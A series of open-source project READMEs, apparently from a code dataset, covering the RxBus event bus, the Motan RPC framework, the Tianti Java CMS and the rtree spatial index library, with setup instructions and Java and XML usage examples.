``` Or, better, create your own RxBus instance: ``` java public static final class RxBus { private static Bus sBus; public static synchronized Bus get() { if (sBus == null) { sBus = new Bus(); } return sBus; } } ``` Add the code where you want to produce/subscribe events, and register and unregister the class. ``` java public class MainActivity extends AppCompatActivity { ... @Override protected void onCreate(Bundle savedInstanceState) { ... RxBus.get().register(this); ... } @Override protected void onDestroy() { ... RxBus.get().unregister(this); ... } @Subscribe public void eat(String food) { // purpose } @Subscribe( thread = EventThread.IO, tags = { @Tag(BusAction.EAT_MORE) } ) public void eatMore(List<String> foods) { // purpose } @Produce public String produceFood() { return "This is bread!"; } @Produce( thread = EventThread.IO, tags = { @Tag(BusAction.EAT_MORE) } ) public List<String> produceMoreFood() { return Arrays.asList("This is breads!"); } public void post() { RxBus.get().post(this); } public void postByTag() { RxBus.get().post(Constants.EventType.TAG_STORY, this); } ... } ``` **That's all!** (The `BusAction` and `Constants.EventType` tags referenced above are plain string constants; a sketch follows at the end of this README.) Lint -------- Features -------- * JUnit test * Docs History -------- Here is the [CHANGELOG](CHANGELOG.md). FAQ -------- **Q:** How to do pull requests?<br/> **A:** Ensure good code quality and consistent formatting. License -------- Copyright 2015 HwangJR, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
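Supplementing the usage example above: the tags referenced by `@Subscribe`/`@Produce` are plain string constants that you define yourself. A minimal sketch (the constant value here is hypothetical; any unique String works as a tag):

``` java
public final class BusAction {
    // hypothetical tag value used by the @Subscribe/@Produce examples above
    public static final String EAT_MORE = "eat_more";

    private BusAction() {
    }
}
```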
0
weibocom/motan
A cross-language remote procedure call(RPC) framework for rapid development of high performance distributed services.
null
# Motan [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/weibocom/motan/blob/master/LICENSE) [![Maven Central](https://img.shields.io/maven-central/v/com.weibo/motan.svg?label=Maven%20Central)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22com.weibo%22%20AND%20motan) [![Build Status](https://img.shields.io/travis/weibocom/motan/master.svg?label=Build)](https://travis-ci.org/weibocom/motan) [![OpenTracing-1.0 Badge](https://img.shields.io/badge/OpenTracing--1.0-enabled-blue.svg)](http://opentracing.io) [![Skywalking Tracing](https://img.shields.io/badge/Skywalking%20Tracing-enable-brightgreen.svg)](https://github.com/OpenSkywalking/skywalking) # Overview Motan is a cross-language remote procedure call (RPC) framework for rapid development of high-performance distributed services. Related projects in the Motan ecosystem: - [Motan-go](https://github.com/weibocom/motan-go) is the Golang implementation. - [Motan-PHP](https://github.com/weibocom/motan-php) is a PHP client that can interact with a Motan server directly or through a Motan-go agent. - [Motan-openresty](https://github.com/weibocom/motan-openresty) is a Lua (LuaJIT) implementation based on [Openresty](http://openresty.org). # Features - Create distributed services without writing extra code. - Provides cluster support and integrates with popular service discovery services like [Consul][consul] or [Zookeeper][zookeeper]. - Supports advanced scheduling features like weighted load balancing, cross-IDC scheduling, etc. - Optimized for high-load scenarios, providing high availability in production environments. - Supports both synchronous and asynchronous calls. - Supports cross-language interaction with Golang, PHP, Lua (LuaJIT), etc. # Quick Start The quick start gives a very basic example of running a client and server on the same machine. For detailed information about using and developing Motan, please jump to [Documents](#documents). > The minimum requirements to run the quick start are: > > - JDK 1.8 or above > - A Java-based project management tool like [Maven][maven] or [Gradle][gradle] ## Synchronous calls 1. Add dependencies to the pom. ```xml <properties> <motan.version>1.1.12</motan.version> <!--use the latest version from maven central--> </properties> <dependencies> <dependency> <groupId>com.weibo</groupId> <artifactId>motan-core</artifactId> <version>${motan.version}</version> </dependency> <dependency> <groupId>com.weibo</groupId> <artifactId>motan-transport-netty</artifactId> <version>${motan.version}</version> </dependency> <!-- dependencies below are only needed for spring-based features --> <dependency> <groupId>com.weibo</groupId> <artifactId>motan-springsupport</artifactId> <version>${motan.version}</version> </dependency> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-context</artifactId> <version>4.2.4.RELEASE</version> </dependency> </dependencies> ``` 2. Create an interface for both the service provider and the consumer. `src/main/java/quickstart/FooService.java` ```java package quickstart; public interface FooService { public String hello(String name); } ``` 3. Write an implementation, then create and start the RPC Server.
`src/main/java/quickstart/FooServiceImpl.java` ```java package quickstart; public class FooServiceImpl implements FooService { public String hello(String name) { System.out.println(name + " invoked rpc service"); return "hello " + name; } } ``` `src/main/resources/motan_server.xml` ```xml <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:motan="http://api.weibo.com/schema/motan" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd http://api.weibo.com/schema/motan http://api.weibo.com/schema/motan.xsd"> <!-- service implementation bean --> <bean id="serviceImpl" class="quickstart.FooServiceImpl" /> <!-- exporting service by motan --> <motan:service interface="quickstart.FooService" ref="serviceImpl" export="8002" /> </beans> ``` `src/main/java/quickstart/Server.java` ```java package quickstart; import org.springframework.context.ApplicationContext; import org.springframework.context.support.ClassPathXmlApplicationContext; public class Server { public static void main(String[] args) throws InterruptedException { ApplicationContext applicationContext = new ClassPathXmlApplicationContext("classpath:motan_server.xml"); System.out.println("server start..."); } } ``` Executing the main function in Server will start a Motan server listening on port 8002. 4. Create and start the RPC Client. `src/main/resources/motan_client.xml` ```xml <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:motan="http://api.weibo.com/schema/motan" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd http://api.weibo.com/schema/motan http://api.weibo.com/schema/motan.xsd"> <!-- reference to the remote service --> <motan:referer id="remoteService" interface="quickstart.FooService" directUrl="localhost:8002"/> </beans> ``` `src/main/java/quickstart/Client.java` ```java package quickstart; import org.springframework.context.ApplicationContext; import org.springframework.context.support.ClassPathXmlApplicationContext; public class Client { public static void main(String[] args) throws InterruptedException { ApplicationContext ctx = new ClassPathXmlApplicationContext("classpath:motan_client.xml"); FooService service = (FooService) ctx.getBean("remoteService"); System.out.println(service.hello("motan")); } } ``` Executing the main function in Client will invoke the remote service and print the response. ## Asynchronous calls 1. Based on the `Synchronous calls` example, add the `@MotanAsync` annotation to the interface `FooService`. ```java package quickstart; import com.weibo.api.motan.transport.async.MotanAsync; @MotanAsync public interface FooService { public String hello(String name); } ``` 2. Add the plugin to the POM file to set `target/generated-sources/annotations/` as a source folder. ```xml <plugin> <groupId>org.codehaus.mojo</groupId> <artifactId>build-helper-maven-plugin</artifactId> <version>1.10</version> <executions> <execution> <phase>generate-sources</phase> <goals> <goal>add-source</goal> </goals> <configuration> <sources> <source>${project.build.directory}/generated-sources/annotations</source> </sources> </configuration> </execution> </executions> </plugin> ``` 3. Modify the `interface` attribute of the referer in `motan_client.xml` from `FooService` to `FooServiceAsync`.
```xml <motan:referer id="remoteService" interface="quickstart.FooServiceAsync" directUrl="localhost:8002"/> ``` 4. Start asynchronous calls. ```java public static void main(String[] args) { ApplicationContext ctx = new ClassPathXmlApplicationContext(new String[] {"classpath:motan_client.xml"}); FooServiceAsync service = (FooServiceAsync) ctx.getBean("remoteService"); // sync call System.out.println(service.hello("motan")); // async call ResponseFuture future = service.helloAsync("motan async "); System.out.println(future.getValue()); // multi call ResponseFuture future1 = service.helloAsync("motan async multi-1"); ResponseFuture future2 = service.helloAsync("motan async multi-2"); System.out.println(future1.getValue() + ", " + future2.getValue()); // async with listener FutureListener listener = new FutureListener() { @Override public void operationComplete(Future future) throws Exception { System.out.println("async call " + (future.isSuccess() ? "success! value:" + future.getValue() : "fail! exception:" + future.getException().getMessage())); } }; ResponseFuture future3 = service.helloAsync("motan async multi-1"); ResponseFuture future4 = service.helloAsync("motan async multi-2"); future3.addListener(listener); future4.addListener(listener); } ``` # Documents - [Wiki](https://github.com/weibocom/motan/wiki) - [Wiki(中文)](https://github.com/weibocom/motan/wiki/zh_overview) # Contributors - maijunsheng([@maijunsheng](https://github.com/maijunsheng)) - fishermen([@hustfisher](https://github.com/hustfisher)) - TangFulin([@tangfl](https://github.com/tangfl)) - bodlyzheng([@bodlyzheng](https://github.com/bodlyzheng)) - jacawang([@jacawang](https://github.com/jacawang)) - zenglingshu([@zenglingshu](https://github.com/zenglingshu)) - Sugar Zouliu([@lamusicoscos](https://github.com/lamusicoscos)) - tangyang([@tangyang](https://github.com/tangyang)) - olivererwang([@olivererwang](https://github.com/olivererwang)) - jackael([@jackael9856](https://github.com/jackael9856)) - Ray([@rayzhang0603](https://github.com/rayzhang0603)) - r2dx([@half-dead](https://github.com/half-dead)) - Jake Zhang([sunnights](https://github.com/sunnights)) - axb([@qdaxb](https://github.com/qdaxb)) - wenqisun([@wenqisun](https://github.com/wenqisun)) - fingki([@fingki](https://github.com/fingki)) - 午夜([@sumory](https://github.com/sumory)) - guanly([@guanly](https://github.com/guanly)) - Di Tang([@tangdi](https://github.com/tangdi)) - 肥佬大([@feilaoda](https://github.com/feilaoda)) - 小马哥([@andot](https://github.com/andot)) - wu-sheng([@wu-sheng](https://github.com/wu-sheng)) &nbsp;&nbsp;&nbsp; _Assist Motan to become the first Chinese RPC framework on [OpenTracing](http://opentracing.io) **Supported Frameworks List**_ - Jin Zhang([@lowzj](https://github.com/lowzj)) - xiaoqing.yuanfang([@xiaoqing-yuanfang](https://github.com/xiaoqing-yuanfang)) - 东方上人([@dongfangshangren](https://github.com/dongfangshangren)) - Voyager3([@xxxxzr](https://github.com/xxxxzr)) - yeluoguigen009([@yeluoguigen009](https://github.com/yeluoguigen009)) - Michael Yang([@yangfuhai](https://github.com/yangfuhai)) - Panying([@anylain](https://github.com/anylain)) # License Motan is released under the [Apache License 2.0](http://www.apache.org/licenses/LICENSE-2.0). [maven]:https://maven.apache.org [gradle]:http://gradle.org [consul]:http://www.consul.io [zookeeper]:http://zookeeper.apache.org
0
xujeff/tianti
A lightweight Java CMS solution - Tianti. Tianti is a back-office CMS solution built with Java-related technologies; users can extend it to fit their own business, and it also provides code generation tools for dao, service, etc. Technology stack: Spring Data JPA, Hibernate, Shiro, Spring MVC, Layer, MySQL, etc.
cms hibernate java layer mysql shiro spring-data-jpa spring-mvc
# Tianti (天梯) [Tianti](https://yuedu.baidu.com/ebook/7a5efa31fbd6195f312b3169a45177232f60e487) [tianti-tool](https://github.com/xujeff/tianti-tool) Introduction:<br> 1. Tianti is a free, lightweight CMS system written in Java that currently provides a complete solution from back-office management to front-end presentation. 2. Users can build a default-style CMS site without writing a single line of code. 3. The front-end pages are responsive, supporting both PC and H5 (mobile web), implemented with a front-end/back-end separation mechanism. The back office supports Tianti Blue and Tianti Red skins. 4. The project has clear technical layering; users can extend it according to their own business modules, which makes secondary development easy.  ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/tiantiframework.png) <br>  ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/help/help.png) <br> Technical architecture:<br> 1. Technology choices: Back end - core framework: Spring Framework 4.2.5.RELEASE; security framework: Apache Shiro 1.3.2; view framework: Spring MVC 4.2.5.RELEASE; database connection pool: Tomcat JDBC; cache framework: Ehcache; ORM framework: Spring Data JPA, Hibernate 4.3.5.Final; logging: SLF4J 1.7.21, Log4j; editor: ueditor; utilities: Apache Commons, Jackson 2.8.5, POI 3.15; view layer: JSP; database: MySQL, Oracle and other relational databases. Front end - DOM: jQuery; pagination: jquery.pagination; UI management: common; UI integration: uiExtend; scrollbar: jquery.nicescroll.min.js; charts: highcharts; 3D charts: highcharts-more; carousel: jquery-swipe; form submission: jquery.form; file upload: jquery.uploadify; form validation: jquery.validator; tree view: jquery.ztree; HTML template engine: template 2. Project structure: 2.1. tianti-common: base abstractions for system services, including the base abstractions for entity, dao and service; 2.2. tianti-org: user/permission module service implementation; 2.3. tianti-cms: content/news module service implementation; 2.4. tianti-module-admin: the Tianti back-office web project; 2.5. tianti-module-interface: the Tianti interface (API) project; 2.6. tianti-module-gateway: the Tianti responsive front-end project (a static project that calls tianti-module-interface to fetch data);    Front-end project overview:<br> PC:<br> ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/index.png)   ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/columnlist.png)   ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/detail.png)   H5:<br> ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/index.png)   ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/columnlist.png)   ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/detail.png)   <br> Back-office project overview:<br> Tianti login page: ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/login.png)   Tianti Blue style (default): ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/userlist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/rolelist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/menulist.png)                           ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/roleset.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/updatePwd.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/skin.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/lanmulist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/addlanmu.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/articlelist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/addarticle.png) Tianti Red style: ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/userlist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/rolelist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/menulist.png)                           ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/roleSet.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/updatePwd.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/skin.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/lanmulist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/addlanmu.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/articlelist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/addarticle.png)
0
davidmoten/rtree
Immutable in-memory R-tree and R*-tree implementations in Java with reactive api
null
rtree ========= <a href="https://github.com/davidmoten/rtree/actions/workflows/ci.yml"><img src="https://github.com/davidmoten/rtree/actions/workflows/ci.yml/badge.svg"/></a><br/> [![Coverity Scan](https://scan.coverity.com/projects/4762/badge.svg?flat=1)](https://scan.coverity.com/projects/4762?tab=overview)<br/> [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.davidmoten/rtree/badge.svg?style=flat)](https://maven-badges.herokuapp.com/maven-central/com.github.davidmoten/rtree)<br/> [![codecov](https://codecov.io/gh/davidmoten/rtree/branch/master/graph/badge.svg)](https://codecov.io/gh/davidmoten/rtree) In-memory immutable 2D [R-tree](http://en.wikipedia.org/wiki/R-tree) implementation in Java using [RxJava Observables](https://github.com/ReactiveX/RxJava) for reactive processing of search results. Status: *released to Maven Central* Note that the **next version** (without a reactive API and without serialization) is at [rtree2](https://github.com/davidmoten/rtree2). An [R-tree](http://en.wikipedia.org/wiki/R-tree) is a commonly used spatial index. This was fun to make, has an elegant concise algorithm, is thread-safe, fast, and reasonably memory efficient (uses structural sharing). The algorithm to achieve immutability is cute. For insertion/deletion it involves recursion down to the required leaf node then recursion back up to replace the parent nodes up to the root. The guts of it are in [Leaf.java](src/main/java/com/github/davidmoten/rtree/internal/LeafDefault.java) and [NonLeaf.java](src/main/java/com/github/davidmoten/rtree/internal/NonLeafDefault.java). [Backpressure](https://github.com/ReactiveX/RxJava/wiki/Backpressure) support required some complexity because effectively a bookmark needed to be kept for a position in the tree and returned to later to continue traversal. An immutable stack containing the node and child index of the path nodes came to the rescue here, and recursion was abandoned in favour of looping to prevent stack overflow (unfortunately Java doesn't support tail recursion!). Maven site reports are [here](http://davidmoten.github.io/rtree/index.html) including [javadoc](http://davidmoten.github.io/rtree/apidocs/index.html). Features ------------ * immutable R-tree suitable for concurrency * Guttman's heuristics (Quadratic splitter) ([paper](https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0CB8QFjAA&url=http%3A%2F%2Fpostgis.org%2Fsupport%2Frtree.pdf&ei=ieEQVJuKGdK8uATpgoKQCg&usg=AFQjCNED9w2KjgiAa9UI-UO_0eWjcADTng&sig2=rZ_dzKHBHY62BlkBuw3oCw&bvm=bv.74894050,d.c2E)) * R*-tree heuristics ([paper](http://dbs.mathematik.uni-marburg.de/publications/myPapers/1990/BKSS90.pdf)) * Customizable [splitter](src/main/java/com/github/davidmoten/rtree/Splitter.java) and [selector](src/main/java/com/github/davidmoten/rtree/Selector.java) * 10x faster index creation with STR bulk loading ([paper](https://www.researchgate.net/profile/Scott_Leutenegger/publication/3686660_STR_A_Simple_and_Efficient_Algorithm_for_R-Tree_Packing/links/5563368008ae86c06b676a02.pdf)); a bulk-loading sketch appears near the end of this README.
* search returns [```Observable```](http://reactivex.io/RxJava/javadoc/rx/Observable.html) * search is cancelled by unsubscription * search is ```O(log(n))``` on average * insert, delete are ```O(n)``` worst case * all search methods return lazy-evaluated streams offering efficiency and flexibility of functional style including functional composition and concurrency * balanced delete * uses structural sharing * supports [backpressure](https://github.com/ReactiveX/RxJava/wiki/Backpressure) * JMH benchmarks * visualizer included * serialization using [FlatBuffers](http://github.com/google/flatbuffers) * high unit test [code coverage](http://davidmoten.github.io/rtree/cobertura/index.html) * R*-tree performs 900,000 searches/second returning 22 entries from a tree of 38,377 Greek earthquake locations on i7-920@2.67GHz (maxChildren=4, minChildren=1). Insert at 240,000 entries per second. * requires Java 1.6 or later Number of points = 1000, max children per node 8: | Quadratic split | R*-tree split | STR bulk loaded | | :-------------: | :-----------: | :-----------: | | <img src="src/docs/quad-1000-8.png?raw=true" /> | <img src="src/docs/star-1000-8.png?raw=true" /> | <img src="src/docs/str-1000-8.png?raw=true" /> | Notice that there is little overlap in the R*-tree split compared to the Quadratic split. This should provide better search performance (and in general benchmarks show this). The STR bulk loaded R-tree has a bit more overlap than the R*-tree, which affects search performance to some extent. Getting started ---------------- Add this maven dependency to your pom.xml: ```xml <dependency> <groupId>com.github.davidmoten</groupId> <artifactId>rtree</artifactId> <version>VERSION_HERE</version> </dependency> ``` ### Instantiate an R-Tree Use the static builder methods on the ```RTree``` class: ```java // create an R-tree using Quadratic split with max // children per node 4, min children 2 (the threshold // at which members are redistributed) RTree<String, Geometry> tree = RTree.create(); ``` You can specify a few parameters to the builder, including *minChildren*, *maxChildren*, *splitter*, *selector*: ```java RTree<String, Geometry> tree = RTree.minChildren(3).maxChildren(6).create(); ``` ### Geometries The following geometries are supported for insertion in an RTree: * `Rectangle` * `Point` * `Circle` * `Line` ### Generic typing If for instance you know that the entry geometry is always ```Point``` then create an ```RTree``` specifying that generic type to gain more type safety: ```java RTree<String, Point> tree = RTree.create(); ``` ### R*-tree If you'd like an R*-tree (which uses a topological splitter on minimal margin, overlap area and area and a selector combination of minimal area increase, minimal overlap, and area): ``` RTree<String, Geometry> tree = RTree.star().maxChildren(6).create(); ``` See benchmarks below for some of the performance differences. ### Add items to the R-tree When you add an item to the R-tree you need to provide a geometry that represents the 2D physical location or extension of the item.
The ``Geometries`` builder provides these factory methods: * ```Geometries.rectangle``` * ```Geometries.circle``` * ```Geometries.point``` * ```Geometries.line``` (requires the *jts-core* dependency) To add an item to an R-tree: ```java RTree<T,Geometry> tree = RTree.create(); tree = tree.add(item, Geometries.point(10,20)); ``` or ```java tree = tree.add(Entries.entry(item, Geometries.point(10,20))); ``` *Important note:* being an immutable data structure, calling ```tree.add(item, geometry)``` does nothing to ```tree```; it returns a new ```RTree``` containing the addition. Make sure you use the result of the ```add```! ### Remove an item from the R-tree To remove an item from an R-tree, you need to match the item and its geometry: ```java tree = tree.delete(item, Geometries.point(10,20)); ``` or ```java tree = tree.delete(entry); ``` *Important note:* being an immutable data structure, calling ```tree.delete(item, geometry)``` does nothing to ```tree```; it returns a new ```RTree``` without the deleted item. Make sure you use the result of the ```delete```! ### Geospatial geometries (lats and longs) To handle wraparounds of longitude values on the earth (180/-180 boundary trickiness) there are special factory methods in the `Geometries` class. If you want to do geospatial searches then you should use these methods to build `Point`s and `Rectangle`s: ```java Point point = Geometries.pointGeographic(lon, lat); Rectangle rectangle = Geometries.rectangleGeographic(lon1, lat1, lon2, lat2); ``` Under the covers these methods normalize the longitude value to be in the interval [-180, 180) and for rectangles the rightmost longitude has 360 added to it if it is less than the leftmost longitude. ### Custom geometries You can also write your own implementation of [```Geometry```](src/main/java/com/github/davidmoten/rtree/geometry/Geometry.java). An implementation of ```Geometry``` needs to specify methods to: * check intersection with a rectangle (you can reuse the distance method here if you want but it might affect performance) * provide a minimum bounding rectangle * implement ```equals``` and ```hashCode``` for consistent equality checking * measure distance to a rectangle (0 means they intersect). Note that this method is only used for search within a distance so implementing this method is *optional*. If you don't want to implement this method just throw a ```RuntimeException```. For the R-tree to be well-behaved, the distance function if implemented needs to satisfy these properties: * ```distance(r) >= 0 for all rectangles r``` * ```if rectangle r1 contains r2 then distance(r1)<=distance(r2)``` * ```distance(r) = 0 if and only if the geometry intersects the rectangle r``` ### Searching The advantage of an R-tree is the ability to search for items in a region reasonably quickly. On average search is ```O(log(n))``` but worst case is ```O(n)```. Search methods return ```Observable``` sequences: ```java Observable<Entry<T, Geometry>> results = tree.search(Geometries.rectangle(0,0,2,2)); ``` or search for items within a distance from the given geometry: ```java Observable<Entry<T, Geometry>> results = tree.search(Geometries.rectangle(0,0,2,2),5.0); ``` To return all entries from an R-tree: ```java Observable<Entry<T, Geometry>> results = tree.entries(); ``` Search with a custom geometry ----------------------------------- Suppose you make a custom geometry like ```Polygon``` and you want to search an ```RTree<String,Point>``` for points inside the polygon.
This is how you do it: ```java RTree<String, Point> tree = RTree.create(); Func2<Point, Polygon, Boolean> pointInPolygon = ... Polygon polygon = ... ... entries = tree.search(polygon, pointInPolygon); ``` The key is that you need to supply the ```intersects``` function (```pointInPolygon```) to the search. It is on you to implement that for all types of geometry present in the ```RTree```. This is one reason that the generic ```Geometry``` type was added in *rtree* 0.5 (so the type system could tell you what geometry types you needed to calculate intersection for). Search with a custom geometry and maxDistance -------------------------------------------------- As per the example above, to do a proximity search you need to specify how to calculate the distance between the geometry you are searching and the entry geometries: ```java RTree<String, Point> tree = RTree.create(); Func2<Point, Polygon, Double> distancePointToPolygon = ... Polygon polygon = ... ... entries = tree.search(polygon, 10, distancePointToPolygon); ``` Example -------------- ```java import com.github.davidmoten.rtree.RTree; import static com.github.davidmoten.rtree.geometry.Geometries.*; RTree<String, Point> tree = RTree.maxChildren(5).create(); tree = tree.add("DAVE", point(10, 20)) .add("FRED", point(12, 25)) .add("MARY", point(97, 125)); Observable<Entry<String, Point>> entries = tree.search(Geometries.rectangle(8, 15, 30, 35)); ``` Searching by distance on lat longs ------------------------------------ See [LatLongExampleTest.java](src/test/java/com/github/davidmoten/rtree/LatLongExampleTest.java) for an example. The example depends on the [*grumpy-core*](https://github.com/davidmoten/grumpy) artifact which is also on Maven Central. Another lat long example searching geo circles ------------------------------------------------ See [LatLongExampleTest.testSearchLatLongCircles()](src/test/java/com/github/davidmoten/rtree/LatLongExampleTest.java) for an example of searching circles around geographic points (using great circle distance). What do I do with the Observable thing? ------------------------------------------- Very useful, see [RxJava](http://github.com/ReactiveX/RxJava). As an example, suppose you want to filter the search results, then apply a function on each and reduce to some best answer: ```java import rx.Observable; import rx.functions.*; import rx.schedulers.Schedulers; Character result = tree.search(Geometries.rectangle(8, 15, 30, 35)) // filter for names alphabetically less than M .filter(entry -> entry.value().compareTo("M") < 0) // get the first character of the name .map(entry -> entry.value().charAt(0)) // reduce to the first character alphabetically .reduce((x,y) -> x <= y ? x : y) // subscribe to the stream and block for the result .toBlocking().single(); System.out.println(result); ``` output: ``` D ``` How to configure the R-tree for best performance -------------------------------------------------- Check out the benchmarks below and refer to [another set of benchmark results](https://github.com/ambling/rtree-benchmark#results), but I recommend you do your own benchmarks because every data set will behave differently. If you don't want to benchmark then use the defaults.
General rules based on the benchmarks: * for data sets of <10,000 entries use the default R-tree (quadratic splitter with maxChildren=4) * for data sets of >=10,000 entries use the star R-tree (R*-tree heuristics with maxChildren=4 by default) * use STR bulk loaded R-tree (quadratic splitter or R*-tree heuristics) for large (where index creation time is important) or static (where insertion and deletion are not frequent) data sets Watch out though, the benchmark data sets had quite specific characteristics. The 1000 entry dataset was randomly generated (so is more or less uniformly distributed) and the *Greek* dataset was earthquake data with its own clustering characteristics. What about memory use? ------------------------ To minimize memory use you can use geometries that store single precision decimal values (`float`) instead of double precision (`double`). Here are examples: ```java // create geometry using double precision Rectangle r = Geometries.rectangle(1.0, 2.0, 3.0, 4.0); // create geometry using single precision Rectangle r = Geometries.rectangle(1.0f, 2.0f, 3.0f, 4.0f); ``` The same creation methods exist for `Circle` and `Line`. How do I just get an Iterable back from a search? --------------------------------------------------------- If you are not familiar with the Observable API and want to skip the reactive stuff then here's how to get an ```Iterable``` from a search: ```java Iterable<T> it = tree.search(Geometries.point(4,5)) .toBlocking().toIterable(); ``` Backpressure ----------------- The backpressure slow path may be enabled by some RxJava operators. This may slow search performance by a factor of 3 but avoids possible out of memory errors and thread starvation due to asynchronous buffering. Backpressure is benchmarked below. Visualizer -------------- To visualize the R-tree in a PNG file of size 600 by 600 pixels just call: ```java tree.visualize(600,600) .save("target/mytree.png"); ``` The result is like the images in the Features section above. Visualize as text -------------------- The ```RTree.asString()``` method returns output like this: ``` mbr=Rectangle [x1=10.0, y1=4.0, x2=62.0, y2=85.0] mbr=Rectangle [x1=28.0, y1=4.0, x2=34.0, y2=85.0] entry=Entry [value=2, geometry=Point [x=29.0, y=4.0]] entry=Entry [value=1, geometry=Point [x=28.0, y=19.0]] entry=Entry [value=4, geometry=Point [x=34.0, y=85.0]] mbr=Rectangle [x1=10.0, y1=45.0, x2=62.0, y2=63.0] entry=Entry [value=5, geometry=Point [x=62.0, y=45.0]] entry=Entry [value=3, geometry=Point [x=10.0, y=63.0]] ``` Serialization ------------------ Release 0.8 includes [flatbuffers](https://github.com/google/flatbuffers) support as a serialization format and as a lower performance but lower memory consumption (approximately one third) option for an RTree. The greek earthquake data (38,377 entries) when placed in a default RTree with `maxChildren=10` takes up 4,548,133 bytes in memory. If that data is serialized then reloaded into memory using the `InternalStructure.FLATBUFFERS_SINGLE_ARRAY` option then the RTree takes up 1,431,772 bytes in memory (approximately one third the memory usage). Bear in mind though that searches are much more expensive (at the moment) with this data structure because of object creation and gc pressures (see benchmarks). Further work would be to enable direct searching of the underlying array without object creation expenses required to match the current search routines. 
As of 5 March 2016, indicative RTree metrics using flatbuffers data structure are: * one third the memory use with log(N) object creations per search * one third the speed with backpressure (e.g. if `flatMap` or `observeOn` is downstream) * one tenth the speed without backpressure Note that serialization uses an optional dependency on `flatbuffers`. Add the following to your pom dependencies: ```xml <dependency> <groupId>com.google.flatbuffers</groupId> <artifactId>flatbuffers-java</artifactId> <version>2.0.3</version> <optional>true</optional> </dependency> ``` ## Serialization example Write an `RTree` to an `OutputStream`: ```java RTree<String, Point> tree = ...; OutputStream os = ...; Serializer<String, Point> serializer = Serializers.flatBuffers().utf8(); serializer.write(tree, os); ``` Read an `RTree` from an `InputStream` into a low-memory flatbuffers based structure: ```java RTree<String, Point> tree = serializer.read(is, lengthBytes, InternalStructure.SINGLE_ARRAY); ``` Read an `RTree` from an `InputStream` into a default structure: ```java RTree<String, Point> tree = serializer.read(is, lengthBytes, InternalStructure.DEFAULT); ``` Dependencies --------------------- As of 0.7.5 this library does not depend on *guava* (>2M) but rather depends on *guava-mini* (11K). The `nearest` search used to depend on `MinMaxPriorityQueue` from guava but now uses a backport of Java 8 `PriorityQueue` inside a custom `BoundedPriorityQueue` class that gives about 1.7x the throughput as the guava class. How to build ---------------- ``` git clone https://github.com/davidmoten/rtree.git cd rtree mvn clean install ``` How to run benchmarks -------------------------- Benchmarks are provided by ``` mvn clean install -Pbenchmark ``` Coverity scan ---------------- This codebase is scanned by Coverity scan whenever the branch `coverity_scan` is updated. For the project committers if a coverity scan is desired just do this: ```bash git checkout coverity_scan git pull origin master git push origin coverity_scan ``` ### Notes The *Greek* data referred to in the benchmarks is a collection of some 38,377 entries corresponding to the epicentres of earthquakes in Greece between 1964 and 2000. This data set is used by multiple studies on R-trees as a test case. 
